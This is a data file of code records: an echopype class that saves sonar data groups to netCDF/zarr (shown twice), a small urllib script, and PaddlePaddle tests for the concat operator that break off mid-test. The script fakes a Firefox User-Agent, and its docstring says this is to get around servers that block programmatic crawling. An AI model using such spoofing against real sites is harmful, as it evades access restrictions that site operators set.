class SetGroupsBase(abc.ABC):
"""Base class for saving groups to netcdf or zarr from echosounder data files."""
def __init__(
self,
parser_obj,
input_file,
output_path,
sonar_model=None,
engine="zarr",
compress=True,
overwrite=True,
params=None,
):
# parser object ParseEK60/ParseAZFP/etc...
self.parser_obj = parser_obj
# Used for when a sonar that is not AZFP/EK60/EK80 can still be saved
self.sonar_model = sonar_model
self.input_file = input_file
self.output_path = output_path
self.engine = engine
self.compress = compress
self.overwrite = overwrite
self.ui_param = params
if not self.compress:
self.compression_settings = None
else:
self.compression_settings = COMPRESSION_SETTINGS[self.engine]
self._varattrs = sonarnetcdf_1.yaml_dict["variable_and_varattributes"]
# self._beamgroups must be a list of dicts, eg:
# [{"name":"Beam_group1", "descr":"contains complex backscatter data
# and other beam or channel-specific data."}]
self._beamgroups = []
# TODO: change the set_XXX methods to return a dataset to be saved
# in the overarching save method
def set_toplevel(self, sonar_model, date_created=None) -> xr.Dataset:
"""Set the top-level group."""
# Collect variables
tl_dict = {
"conventions": "CF-1.7, SONAR-netCDF4-1.0, ACDD-1.3",
"keywords": sonar_model,
"sonar_convention_authority": "ICES",
"sonar_convention_name": "SONAR-netCDF4",
"sonar_convention_version": "1.0",
"summary": "",
"title": "",
"date_created": np.datetime_as_string(date_created, "s") + "Z",
"survey_name": self.ui_param["survey_name"],
}
# Save
ds = xr.Dataset()
ds = ds.assign_attrs(tl_dict)
return ds
def set_provenance(self) -> xr.Dataset:
"""Set the Provenance group."""
prov_dict = echopype_prov_attrs(process_type="conversion")
ds = xr.Dataset(source_files_vars(self.input_file))
ds = ds.assign_attrs(prov_dict)
return ds
@abc.abstractmethod
def set_env(self) -> xr.Dataset:
"""Set the Environment group."""
raise NotImplementedError
@abc.abstractmethod
def set_sonar(self) -> xr.Dataset:
"""Set the Sonar group."""
raise NotImplementedError
@abc.abstractmethod
def set_beam(self) -> xr.Dataset:
"""Set the /Sonar/Beam group."""
raise NotImplementedError
@abc.abstractmethod
def set_platform(self) -> xr.Dataset:
"""Set the Platform group."""
raise NotImplementedError
def set_nmea(self) -> xr.Dataset:
"""Set the Platform/NMEA group."""
# Save nan if nmea data is not encoded in the raw file
if len(self.parser_obj.nmea["nmea_string"]) != 0:
# Convert np.datetime64 numbers to seconds since 1900-01-01 00:00:00Z
# due to xarray.to_netcdf() error on encoding np.datetime64 objects directly
time = (
self.parser_obj.nmea["timestamp"] - np.datetime64("1900-01-01T00:00:00")
) / np.timedelta64(1, "s")
raw_nmea = self.parser_obj.nmea["nmea_string"]
else:
time = [np.nan]
raw_nmea = [np.nan]
ds = xr.Dataset(
{
"NMEA_datagram": (
["time1"],
raw_nmea,
{"long_name": "NMEA datagram"},
)
},
coords={
"time1": (
["time1"],
time,
{
"axis": "T",
"long_name": "Timestamps for NMEA datagrams",
"standard_name": "time",
"comment": "Time coordinate corresponding to NMEA sensor data.",
},
)
},
attrs={"description": "All NMEA sensor datagrams"},
)
return set_encodings(ds)
@abc.abstractmethod
def set_vendor(self) -> xr.Dataset:
"""Set the Vendor_specific group."""
raise NotImplementedError
# TODO: move this to be part of parser as it is not a "set" operation
def _parse_NMEA(self):
"""Get the lat and lon values from the raw nmea data"""
messages = [string[3:6] for string in self.parser_obj.nmea["nmea_string"]]
idx_loc = np.argwhere(np.isin(messages, self.ui_param["nmea_gps_sentence"])).squeeze()
if idx_loc.size == 1: # in case of only 1 matching message
idx_loc = np.expand_dims(idx_loc, axis=0)
nmea_msg = []
for x in idx_loc:
try:
nmea_msg.append(pynmea2.parse(self.parser_obj.nmea["nmea_string"][x]))
except (
pynmea2.ChecksumError,
pynmea2.SentenceTypeError,
AttributeError,
pynmea2.ParseError,
):
nmea_msg.append(None)
lat = (
np.array([x.latitude if hasattr(x, "latitude") else np.nan for x in nmea_msg])
if nmea_msg
else [np.nan]
)
lon = (
np.array([x.longitude if hasattr(x, "longitude") else np.nan for x in nmea_msg])
if nmea_msg
else [np.nan]
)
msg_type = (
np.array([x.sentence_type if hasattr(x, "sentence_type") else np.nan for x in nmea_msg])
if nmea_msg
else [np.nan]
)
time1 = (
(
np.array(self.parser_obj.nmea["timestamp"])[idx_loc]
- np.datetime64("1900-01-01T00:00:00")
)
/ np.timedelta64(1, "s")
if nmea_msg
else [np.nan]
)
return time1, msg_type, lat, lon
def _beam_groups_vars(self):
"""Stage beam_group coordinate and beam_group_descr variables sharing
a common dimension, beam_group, to be inserted in the Sonar group"""
beam_groups_vars = {
"beam_group_descr": (
["beam_group"],
[di["descr"] for di in self._beamgroups],
{"long_name": "Beam group description"},
),
}
beam_groups_coord = {
"beam_group": (
["beam_group"],
[di["name"] for di in self._beamgroups],
{"long_name": "Beam group name"},
),
}
return beam_groups_vars, beam_groups_coord
@staticmethod
def _add_beam_dim(ds: xr.Dataset, beam_only_names: Set[str], beam_ping_time_names: Set[str]):
"""
Adds ``beam`` as the last dimension to the appropriate
variables in ``Sonar/Beam_groupX`` groups when necessary.
Notes
-----
When expanding the dimension of a Dataarray, it is necessary
to copy the array (hence the .copy()). This allows the array
to be writable downstream (i.e. we can assign values to
certain indices).
To retain the attributes and encoding of ``beam``
it is necessary to use .assign_coords() with ``beam``
from ds.
"""
# variables to add beam to
add_beam_names = set(ds.variables).intersection(beam_only_names.union(beam_ping_time_names))
for var_name in add_beam_names:
if "beam" in ds.dims:
if "beam" not in ds[var_name].dims:
ds[var_name] = (
ds[var_name]
.expand_dims(dim={"beam": ds.beam}, axis=ds[var_name].ndim)
.assign_coords(beam=ds.beam)
.copy()
)
else:
# Add a single-value beam dimension and its attributes
ds[var_name] = (
ds[var_name]
.expand_dims(dim={"beam": np.array(["1"], dtype=str)}, axis=ds[var_name].ndim)
.copy()
)
ds[var_name].beam.attrs = sonarnetcdf_1.yaml_dict["variable_and_varattributes"][
"beam_coord_default"
]["beam"]
@staticmethod
def _add_ping_time_dim(
ds: xr.Dataset, beam_ping_time_names: Set[str], ping_time_only_names: Set[str]
):
"""
Adds ``ping_time`` as the last dimension to the appropriate
variables in ``Sonar/Beam_group1`` and ``Sonar/Beam_group2``
(when necessary).
Notes
-----
When expanding the dimension of a Dataarray, it is necessary
to copy the array (hence the .copy()). This allows the array
to be writable downstream (i.e. we can assign values to
certain indices).
To retain the attributes and encoding of ``ping_time``
it is necessary to use .assign_coords() with ``ping_time``
from ds.
"""
# variables to add ping_time to
add_ping_time_names = (
set(ds.variables).intersection(beam_ping_time_names).union(ping_time_only_names)
)
for var_name in add_ping_time_names:
ds[var_name] = (
ds[var_name]
.expand_dims(dim={"ping_time": ds.ping_time}, axis=ds[var_name].ndim)
.assign_coords(ping_time=ds.ping_time)
.copy()
)
def beam_groups_to_convention(
self,
ds: xr.Dataset,
beam_only_names: Set[str],
beam_ping_time_names: Set[str],
ping_time_only_names: Set[str],
):
"""
Manipulates variables in ``Sonar/Beam_groupX``
to adhere to SONAR-netCDF4 vers. 1 with respect
to the use of ``ping_time`` and ``beam`` dimensions.
This does several things:
1. Creates ``beam`` dimension and coordinate variable
when not present.
2. Adds ``beam`` dimension to several variables
when missing.
3. Adds ``ping_time`` dimension to several variables
when missing.
Parameters
----------
ds : xr.Dataset
Dataset corresponding to ``Beam_groupX``.
beam_only_names : Set[str]
Variables that need only the beam dimension added to them.
beam_ping_time_names : Set[str]
Variables that need beam and ping_time dimensions added to them.
ping_time_only_names : Set[str]
Variables that need only the ping_time dimension added to them.
"""
self._add_ping_time_dim(ds, beam_ping_time_names, ping_time_only_names)
self._add_beam_dim(ds, beam_only_names, beam_ping_time_names)
|
import abc
from typing import Set
import numpy as np
import pynmea2
import xarray as xr
from ..echodata.convention import sonarnetcdf_1
from ..utils.coding import COMPRESSION_SETTINGS, set_encodings
from ..utils.prov import echopype_prov_attrs, source_files_vars
DEFAULT_CHUNK_SIZE = {"range_sample": 25000, "ping_time": 2500}
class SetGroupsBase(abc.ABC):
"""Base class for saving groups to netcdf or zarr from echosounder data files."""
def __init__(
self,
parser_obj,
input_file,
output_path,
sonar_model=None,
engine="zarr",
compress=True,
overwrite=True,
params=None,
):
# parser object ParseEK60/ParseAZFP/etc...
self.parser_obj = parser_obj
# Used for when a sonar that is not AZFP/EK60/EK80 can still be saved
self.sonar_model = sonar_model
self.input_file = input_file
self.output_path = output_path
self.engine = engine
self.compress = compress
self.overwrite = overwrite
self.ui_param = params
if not self.compress:
self.compression_settings = None
else:
self.compression_settings = COMPRESSION_SETTINGS[self.engine]
self._varattrs = sonarnetcdf_1.yaml_dict["variable_and_varattributes"]
# self._beamgroups must be a list of dicts, eg:
# [{"name":"Beam_group1", "descr":"contains complex backscatter data
# and other beam or channel-specific data."}]
self._beamgroups = []
# TODO: change the set_XXX methods to return a dataset to be saved
# in the overarching save method
def set_toplevel(self, sonar_model, date_created=None) -> xr.Dataset:
"""Set the top-level group."""
# Collect variables
tl_dict = {
"conventions": "CF-1.7, SONAR-netCDF4-1.0, ACDD-1.3",
"keywords": sonar_model,
"sonar_convention_authority": "ICES",
"sonar_convention_name": "SONAR-netCDF4",
"sonar_convention_version": "1.0",
"summary": "",
"title": "",
"date_created": np.datetime_as_string(date_created, "s") + "Z",
"survey_name": self.ui_param["survey_name"],
}
# Save
ds = xr.Dataset()
ds = ds.assign_attrs(tl_dict)
return ds
def set_provenance(self) -> xr.Dataset:
"""Set the Provenance group."""
prov_dict = echopype_prov_attrs(process_type="conversion")
ds = xr.Dataset(source_files_vars(self.input_file))
ds = ds.assign_attrs(prov_dict)
return ds
@abc.abstractmethod
def set_env(self) -> xr.Dataset:
"""Set the Environment group."""
raise NotImplementedError
@abc.abstractmethod
def set_sonar(self) -> xr.Dataset:
"""Set the Sonar group."""
raise NotImplementedError
@abc.abstractmethod
def set_beam(self) -> xr.Dataset:
"""Set the /Sonar/Beam group."""
raise NotImplementedError
@abc.abstractmethod
def set_platform(self) -> xr.Dataset:
"""Set the Platform group."""
raise NotImplementedError
def set_nmea(self) -> xr.Dataset:
"""Set the Platform/NMEA group."""
# Save nan if nmea data is not encoded in the raw file
if len(self.parser_obj.nmea["nmea_string"]) != 0:
# Convert np.datetime64 numbers to seconds since 1900-01-01 00:00:00Z
# due to xarray.to_netcdf() error on encoding np.datetime64 objects directly
time = (
self.parser_obj.nmea["timestamp"] - np.datetime64("1900-01-01T00:00:00")
) / np.timedelta64(1, "s")
raw_nmea = self.parser_obj.nmea["nmea_string"]
else:
time = [np.nan]
raw_nmea = [np.nan]
ds = xr.Dataset(
{
"NMEA_datagram": (
["time1"],
raw_nmea,
{"long_name": "NMEA datagram"},
)
},
coords={
"time1": (
["time1"],
time,
{
"axis": "T",
"long_name": "Timestamps for NMEA datagrams",
"standard_name": "time",
"comment": "Time coordinate corresponding to NMEA sensor data.",
},
)
},
attrs={"description": "All NMEA sensor datagrams"},
)
return set_encodings(ds)
@abc.abstractmethod
def set_vendor(self) -> xr.Dataset:
"""Set the Vendor_specific group."""
raise NotImplementedError
# TODO: move this to be part of parser as it is not a "set" operation
def _parse_NMEA(self):
"""Get the lat and lon values from the raw nmea data"""
messages = [string[3:6] for string in self.parser_obj.nmea["nmea_string"]]
idx_loc = np.argwhere(np.isin(messages, self.ui_param["nmea_gps_sentence"])).squeeze()
if idx_loc.size == 1: # in case of only 1 matching message
idx_loc = np.expand_dims(idx_loc, axis=0)
nmea_msg = []
for x in idx_loc:
try:
nmea_msg.append(pynmea2.parse(self.parser_obj.nmea["nmea_string"][x]))
except (
pynmea2.ChecksumError,
pynmea2.SentenceTypeError,
AttributeError,
pynmea2.ParseError,
):
nmea_msg.append(None)
lat = (
np.array([x.latitude if hasattr(x, "latitude") else np.nan for x in nmea_msg])
if nmea_msg
else [np.nan]
)
lon = (
np.array([x.longitude if hasattr(x, "longitude") else np.nan for x in nmea_msg])
if nmea_msg
else [np.nan]
)
msg_type = (
np.array([x.sentence_type if hasattr(x, "sentence_type") else np.nan for x in nmea_msg])
if nmea_msg
else [np.nan]
)
time1 = (
(
np.array(self.parser_obj.nmea["timestamp"])[idx_loc]
- np.datetime64("1900-01-01T00:00:00")
)
/ np.timedelta64(1, "s")
if nmea_msg
else [np.nan]
)
return time1, msg_type, lat, lon
def _beam_groups_vars(self):
"""Stage beam_group coordinate and beam_group_descr variables sharing
a common dimension, beam_group, to be inserted in the Sonar group"""
beam_groups_vars = {
"beam_group_descr": (
["beam_group"],
[di["descr"] for di in self._beamgroups],
{"long_name": "Beam group description"},
),
}
beam_groups_coord = {
"beam_group": (
["beam_group"],
[di["name"] for di in self._beamgroups],
{"long_name": "Beam group name"},
),
}
return beam_groups_vars, beam_groups_coord
@staticmethod
def _add_beam_dim(ds: xr.Dataset, beam_only_names: Set[str], beam_ping_time_names: Set[str]):
"""
Adds ``beam`` as the last dimension to the appropriate
variables in ``Sonar/Beam_groupX`` groups when necessary.
Notes
-----
When expanding the dimension of a Dataarray, it is necessary
to copy the array (hence the .copy()). This allows the array
to be writable downstream (i.e. we can assign values to
certain indices).
To retain the attributes and encoding of ``beam``
it is necessary to use .assign_coords() with ``beam``
from ds.
"""
# variables to add beam to
add_beam_names = set(ds.variables).intersection(beam_only_names.union(beam_ping_time_names))
for var_name in add_beam_names:
if "beam" in ds.dims:
if "beam" not in ds[var_name].dims:
ds[var_name] = (
ds[var_name]
.expand_dims(dim={"beam": ds.beam}, axis=ds[var_name].ndim)
.assign_coords(beam=ds.beam)
.copy()
)
else:
# Add a single-value beam dimension and its attributes
ds[var_name] = (
ds[var_name]
.expand_dims(dim={"beam": np.array(["1"], dtype=str)}, axis=ds[var_name].ndim)
.copy()
)
ds[var_name].beam.attrs = sonarnetcdf_1.yaml_dict["variable_and_varattributes"][
"beam_coord_default"
]["beam"]
@staticmethod
def _add_ping_time_dim(
ds: xr.Dataset, beam_ping_time_names: Set[str], ping_time_only_names: Set[str]
):
"""
Adds ``ping_time`` as the last dimension to the appropriate
variables in ``Sonar/Beam_group1`` and ``Sonar/Beam_group2``
(when necessary).
Notes
-----
When expanding the dimension of a Dataarray, it is necessary
to copy the array (hence the .copy()). This allows the array
to be writable downstream (i.e. we can assign values to
certain indices).
To retain the attributes and encoding of ``ping_time``
it is necessary to use .assign_coords() with ``ping_time``
from ds.
"""
# variables to add ping_time to
add_ping_time_names = (
set(ds.variables).intersection(beam_ping_time_names).union(ping_time_only_names)
)
for var_name in add_ping_time_names:
ds[var_name] = (
ds[var_name]
.expand_dims(dim={"ping_time": ds.ping_time}, axis=ds[var_name].ndim)
.assign_coords(ping_time=ds.ping_time)
.copy()
)
def beam_groups_to_convention(
self,
ds: xr.Dataset,
beam_only_names: Set[str],
beam_ping_time_names: Set[str],
ping_time_only_names: Set[str],
):
"""
Manipulates variables in ``Sonar/Beam_groupX``
to adhere to SONAR-netCDF4 vers. 1 with respect
to the use of ``ping_time`` and ``beam`` dimensions.
This does several things:
1. Creates ``beam`` dimension and coordinate variable
when not present.
2. Adds ``beam`` dimension to several variables
when missing.
3. Adds ``ping_time`` dimension to several variables
when missing.
Parameters
----------
ds : xr.Dataset
Dataset corresponding to ``Beam_groupX``.
beam_only_names : Set[str]
Variables that need only the beam dimension added to them.
beam_ping_time_names : Set[str]
Variables that need beam and ping_time dimensions added to them.
ping_time_only_names : Set[str]
Variables that need only the ping_time dimension added to them.
"""
self._add_ping_time_dim(ds, beam_ping_time_names, ping_time_only_names)
self._add_beam_dim(ds, beam_only_names, beam_ping_time_names)
|
en
| 0.735876
|
Base class for saving groups to netcdf or zarr from echosounder data files. # parser object ParseEK60/ParseAZFP/etc... # Used for when a sonar that is not AZFP/EK60/EK80 can still be saved # self._beamgroups must be a list of dicts, eg: # [{"name":"Beam_group1", "descr":"contains complex backscatter data # and other beam or channel-specific data."}] # TODO: change the set_XXX methods to return a dataset to be saved # in the overarching save method Set the top-level group. # Collect variables # Save Set the Provenance group. Set the Environment group. Set the Sonar group. Set the /Sonar/Beam group. Set the Platform group. Set the Platform/NMEA group. # Save nan if nmea data is not encoded in the raw file # Convert np.datetime64 numbers to seconds since 1900-01-01 00:00:00Z # due to xarray.to_netcdf() error on encoding np.datetime64 objects directly Set the Vendor_specific group. # TODO: move this to be part of parser as it is not a "set" operation Get the lat and lon values from the raw nmea data # in case of only 1 matching message Stage beam_group coordinate and beam_group_descr variables sharing a common dimension, beam_group, to be inserted in the Sonar group Adds ``beam`` as the last dimension to the appropriate variables in ``Sonar/Beam_groupX`` groups when necessary. Notes ----- When expanding the dimension of a Dataarray, it is necessary to copy the array (hence the .copy()). This allows the array to be writable downstream (i.e. we can assign values to certain indices). To retain the attributes and encoding of ``beam`` it is necessary to use .assign_coords() with ``beam`` from ds. # variables to add beam to # Add a single-value beam dimension and its attributes Adds ``ping_time`` as the last dimension to the appropriate variables in ``Sonar/Beam_group1`` and ``Sonar/Beam_group2`` (when necessary). Notes ----- When expanding the dimension of a Dataarray, it is necessary to copy the array (hence the .copy()). This allows the array to be writable downstream (i.e. we can assign values to certain indices). To retain the attributes and encoding of ``ping_time`` it is necessary to use .assign_coords() with ``ping_time`` from ds. # variables to add ping_time to Manipulates variables in ``Sonar/Beam_groupX`` to adhere to SONAR-netCDF4 vers. 1 with respect to the use of ``ping_time`` and ``beam`` dimensions. This does several things: 1. Creates ``beam`` dimension and coordinate variable when not present. 2. Adds ``beam`` dimension to several variables when missing. 3. Adds ``ping_time`` dimension to several variables when missing. Parameters ---------- ds : xr.Dataset Dataset corresponding to ``Beam_groupX``. beam_only_names : Set[str] Variables that need only the beam dimension added to them. beam_ping_time_names : Set[str] Variables that need beam and ping_time dimensions added to them. ping_time_only_names : Set[str] Variables that need only the ping_time dimension added to them.
| 2.371644
| 2
|
nsd1803/python/day12/get_web2.py
|
MrWangwf/nsd1806
| 0
|
6627565
|
<reponame>MrWangwf/nsd1806
'为了防止由于服务器限制,不能通过程序爬取页面,模拟使用Firefox浏览'
from urllib import request
url = 'http://127.0.0.1/'
header = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
r = request.Request(url, headers=header)
html = request.urlopen(r)
data = html.read()
print(data.decode('utf8'))
# tail -f /var/log/httpd/access_log
|
'为了防止由于服务器限制,不能通过程序爬取页面,模拟使用Firefox浏览'
from urllib import request
url = 'http://127.0.0.1/'
header = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
r = request.Request(url, headers=header)
html = request.urlopen(r)
data = html.read()
print(data.decode('utf8'))
# tail -f /var/log/httpd/access_log
|
en
| 0.587914
|
# tail -f /var/log/httpd/access_log
| 2.564031
| 3
|
python/paddle/fluid/tests/unittests/test_concat_op.py
|
L-Net-1992/Paddle
| 11
|
6627566
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from paddle.fluid.tests.unittests.op_test import OpTest, skip_check_grad_ci, convert_float_to_uint16
import paddle.fluid as fluid
from paddle.fluid import compiler, Program, program_guard, core
from paddle.fluid.framework import _test_eager_guard
import paddle
class TestConcatOp(OpTest):
def setUp(self):
self.op_type = "concat"
self.python_api = paddle.concat
self.dtype = self.get_dtype()
self.init_test_data()
self.inputs = {'X': [('x0', self.x0), ('x1', self.x1), ('x2', self.x2)]}
self.attrs = {'axis': self.axis}
if self.axis < 0:
self.actual_axis = self.axis + len(self.x0.shape)
self.actual_axis = self.actual_axis if self.actual_axis > 0 else 0
else:
self.actual_axis = self.axis
self.outputs = {
'Out':
np.concatenate((self.x0, self.x1, self.x2), axis=self.actual_axis)
}
def get_dtype(self):
return "float64"
def test_check_output(self):
if self.dtype == np.uint16:
place = core.CUDAPlace(0)
self.check_output_with_place(place)
else:
self.check_output(check_eager=True)
def test_check_grad(self):
if self.dtype == np.uint16:
place = core.CUDAPlace(0)
self.check_grad_with_place(place, ['x0'], 'Out')
self.check_grad_with_place(place, ['x1'], 'Out')
self.check_grad_with_place(place, ['x2'], 'Out')
else:
self.check_grad(['x0'], 'Out', check_eager=True)
self.check_grad(['x1'], 'Out', check_eager=True)
self.check_grad(['x2'], 'Out', check_eager=True)
def init_test_data(self):
if self.dtype == np.uint16:
x0 = np.random.random((5, 1, 4, 5)).astype(np.float32)
self.x0 = convert_float_to_uint16(x0)
x1 = np.random.random((5, 2, 4, 5)).astype(np.float32)
self.x1 = convert_float_to_uint16(x1)
x2 = np.random.random((5, 3, 4, 5)).astype(np.float32)
self.x2 = convert_float_to_uint16(x2)
else:
self.x0 = np.random.random((5, 1, 4, 5)).astype(self.dtype)
self.x1 = np.random.random((5, 2, 4, 5)).astype(self.dtype)
self.x2 = np.random.random((5, 3, 4, 5)).astype(self.dtype)
self.axis = 1
class TestConcatOp2(TestConcatOp):
def init_test_data(self):
self.x0 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.x1 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.x2 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.axis = 1
@skip_check_grad_ci(
reason="The function 'check_grad' for large inputs is too slow.")
class TestConcatOp3(TestConcatOp):
def init_test_data(self):
self.x0 = np.random.random((1, 256, 170, 256)).astype(self.dtype)
self.x1 = np.random.random((1, 128, 170, 256)).astype(self.dtype)
self.x2 = np.random.random((1, 128, 170, 256)).astype(self.dtype)
self.axis = 1
def test_check_grad(self):
pass
@skip_check_grad_ci(
reason=
"This test will meet fetch error when there is a null grad. The detailed information is in PR#17015."
)
class TestConcatOp4(TestConcatOp):
def init_test_data(self):
self.x0 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.x1 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.x2 = np.random.random((0, 3, 4, 5)).astype(self.dtype)
self.axis = 0
def test_check_grad(self):
pass
class TestConcatOp5(TestConcatOp):
def init_test_data(self):
self.x0 = np.random.random((5, 1, 4, 5)).astype(self.dtype)
self.x1 = np.random.random((5, 2, 4, 5)).astype(self.dtype)
self.x2 = np.random.random((5, 3, 4, 5)).astype(self.dtype)
self.axis = -3
class TestConcatOp6(TestConcatOp):
def setUp(self):
self.op_type = "concat"
self.dtype = self.get_dtype()
self.python_api = paddle.concat
self.init_test_data()
self.lod = [[20, 80]]
self.out_lod = [[20, 80, 20, 80, 20, 80]]
self.inputs = {
'X': [('x0', (self.x0, self.lod)), ('x1', (self.x1, self.lod)),
('x2', (self.x2, self.lod))]
}
self.attrs = {'axis': self.axis}
if self.axis < 0:
self.actual_axis = self.axis + len(self.x0.shape)
self.actual_axis = self.actual_axis if self.actual_axis > 0 else 0
else:
self.actual_axis = self.axis
out = np.concatenate((self.x0, self.x1, self.x2), axis=self.actual_axis)
self.outputs = {'Out': (out, self.out_lod)}
def test_check_output(self):
self.check_output(check_eager=True)
def test_check_grad(self):
self.check_grad(['x0'], 'Out', check_eager=True)
self.check_grad(['x1'], 'Out', check_eager=True)
self.check_grad(['x2'], 'Out', check_eager=True)
def init_test_data(self):
self.x0 = np.random.random([100]).astype(self.dtype)
self.x1 = np.random.random([100]).astype(self.dtype)
self.x2 = np.random.random([100]).astype(self.dtype)
self.axis = 0
def create_test_AxisTensor(parent):
class TestConcatAxisTensor(parent):
def setUp(self):
self.op_type = "concat"
self.python_api = paddle.concat
self.dtype = self.get_dtype()
self.init_test_data()
self.inputs = {
'X': [('x0', self.x0), ('x1', self.x1), ('x2', self.x2)],
'AxisTensor': np.array([self.axis]).astype("int32")
}
self.attrs = {}
if self.axis < 0:
self.actual_axis = self.axis + len(self.x0.shape)
self.actual_axis = self.actual_axis if self.actual_axis > 0 else 0
else:
self.actual_axis = self.axis
self.outputs = {
'Out':
np.concatenate((self.x0, self.x1, self.x2),
axis=self.actual_axis)
}
cls_name = "{0}_{1}".format(parent.__name__, "AxisTensor")
TestConcatAxisTensor.__name__ = cls_name
globals()[cls_name] = TestConcatAxisTensor
create_test_AxisTensor(TestConcatOp)
create_test_AxisTensor(TestConcatOp2)
create_test_AxisTensor(TestConcatOp3)
create_test_AxisTensor(TestConcatOp4)
create_test_AxisTensor(TestConcatOp5)
create_test_AxisTensor(TestConcatOp6)
#----------------Concat Fp16----------------
def create_test_fp16(parent):
class TestConcatFp16(parent):
def get_dtype(self):
return np.float16
cls_name = "{0}_{1}".format(parent.__name__, "Fp16")
TestConcatFp16.__name__ = cls_name
globals()[cls_name] = TestConcatFp16
create_test_fp16(TestConcatOp)
create_test_fp16(TestConcatOp2)
create_test_fp16(TestConcatOp3)
create_test_fp16(TestConcatOp4)
create_test_fp16(TestConcatOp5)
create_test_fp16(TestConcatOp6)
#----------------Concat Bf16----------------
def create_test_bf16(parent):
@unittest.skipIf(not paddle.is_compiled_with_cuda(),
"core is not compiled with CUDA")
class TestConcatBf16(parent):
def get_dtype(self):
return np.uint16
cls_name = "{0}_{1}".format(parent.__name__, "Bf16")
TestConcatBf16.__name__ = cls_name
globals()[cls_name] = TestConcatBf16
create_test_bf16(TestConcatOp)
class TestConcatOpError(unittest.TestCase):
def test_errors(self):
with program_guard(Program(), Program()):
# The input type of concat_op should be list.
x1 = fluid.layers.data(shape=[4], dtype='int32', name='x1')
fluid.layers.concat(x1)
# The item in input must be Variable.
x2 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
fluid.CPUPlace())
x3 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
fluid.CPUPlace())
self.assertRaises(TypeError, fluid.layers.concat, [x2])
# The input dtype of concat_op must be float16, float32, float64, int32, int64.
x4 = fluid.layers.data(shape=[4], dtype='uint8', name='x4')
x5 = fluid.layers.data(shape=[4], dtype='uint8', name='x5')
self.assertRaises(TypeError, fluid.layers.concat, [x4, x5])
x6 = fluid.layers.data(shape=[4], dtype='float16', name='x6')
x7 = fluid.layers.data(shape=[4], dtype='float16', name='x7')
x8 = fluid.layers.data(shape=[4], dtype='float32', name='x8')
fluid.layers.concat([x6, x7])
# The type of axis in concat_op should be int or Variable.
def test_axis_type():
fluid.layers.concat([x6, x7], 3.2)
self.assertRaises(TypeError, test_axis_type)
def test_input_same_dtype():
fluid.layers.concat([x7, x8])
self.assertRaises(TypeError, test_input_same_dtype)
class TestConcatAPI(unittest.TestCase):
def test_fluid_api(self):
paddle.enable_static()
x_1 = fluid.data(shape=[None, 1, 4, 5], dtype='int32', name='x_1')
fluid.layers.concat([x_1, x_1], 0)
input_2 = np.random.random([2, 1, 4, 5]).astype("int32")
input_3 = np.random.random([2, 2, 4, 5]).astype("int32")
x_2 = fluid.data(shape=[2, 1, 4, 5], dtype='int32', name='x_2')
x_3 = fluid.data(shape=[2, 2, 4, 5], dtype='int32', name='x_3')
positive_1_int32 = fluid.layers.fill_constant([1], "int32", 1)
positive_1_int64 = fluid.layers.fill_constant([1], "int64", 1)
out_1 = fluid.layers.concat(input=[x_2, x_3], axis=1)
out_2 = fluid.layers.concat(input=[x_2, x_3], axis=positive_1_int32)
out_3 = fluid.layers.concat(input=[x_2, x_3], axis=positive_1_int64)
exe = fluid.Executor(place=fluid.CPUPlace())
[res_1, res_2, res_3] = exe.run(fluid.default_main_program(),
feed={
"x_1": input_2,
"x_2": input_2,
"x_3": input_3
},
fetch_list=[out_1, out_2, out_3])
assert np.array_equal(res_1, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_2, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_3, np.concatenate((input_2, input_3), axis=1))
def test_api(self):
paddle.enable_static()
x_1 = paddle.fluid.data(shape=[None, 1, 4, 5],
dtype='int32',
name='x_1')
paddle.concat([x_1, x_1], 0)
input_2 = np.random.random([2, 1, 4, 5]).astype("int32")
input_3 = np.random.random([2, 2, 4, 5]).astype("int32")
x_2 = fluid.data(shape=[2, 1, 4, 5], dtype='int32', name='x_2')
x_3 = fluid.data(shape=[2, 2, 4, 5], dtype='int32', name='x_3')
positive_1_int32 = paddle.fluid.layers.fill_constant([1], "int32", 1)
positive_1_int64 = paddle.fluid.layers.fill_constant([1], "int64", 1)
negative_int64 = paddle.fluid.layers.fill_constant([1], "int64", -3)
out_1 = paddle.concat(x=[x_2, x_3], axis=1)
out_2 = paddle.concat(x=[x_2, x_3], axis=positive_1_int32)
out_3 = paddle.concat(x=[x_2, x_3], axis=positive_1_int64)
out_4 = paddle.concat(x=[x_2, x_3], axis=negative_int64)
exe = paddle.static.Executor(place=paddle.CPUPlace())
[res_1, res_2, res_3,
res_4] = exe.run(paddle.static.default_main_program(),
feed={
"x_1": input_2,
"x_2": input_2,
"x_3": input_3
},
fetch_list=[out_1, out_2, out_3, out_4])
assert np.array_equal(res_1, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_2, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_3, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_4, np.concatenate((input_2, input_3), axis=1))
def test_imperative(self):
in1 = np.array([[1, 2, 3], [4, 5, 6]])
in2 = np.array([[11, 12, 13], [14, 15, 16]])
in3 = np.array([[21, 22], [23, 24]])
paddle.disable_static()
x1 = paddle.to_tensor(in1)
x2 = paddle.to_tensor(in2)
x3 = paddle.to_tensor(in3)
out1 = fluid.layers.concat(input=[x1, x2, x3], axis=-1)
out2 = paddle.concat(x=[x1, x2], axis=0)
np_out1 = np.concatenate([in1, in2, in3], axis=-1)
np_out2 = np.concatenate([in1, in2], axis=0)
paddle.enable_static()
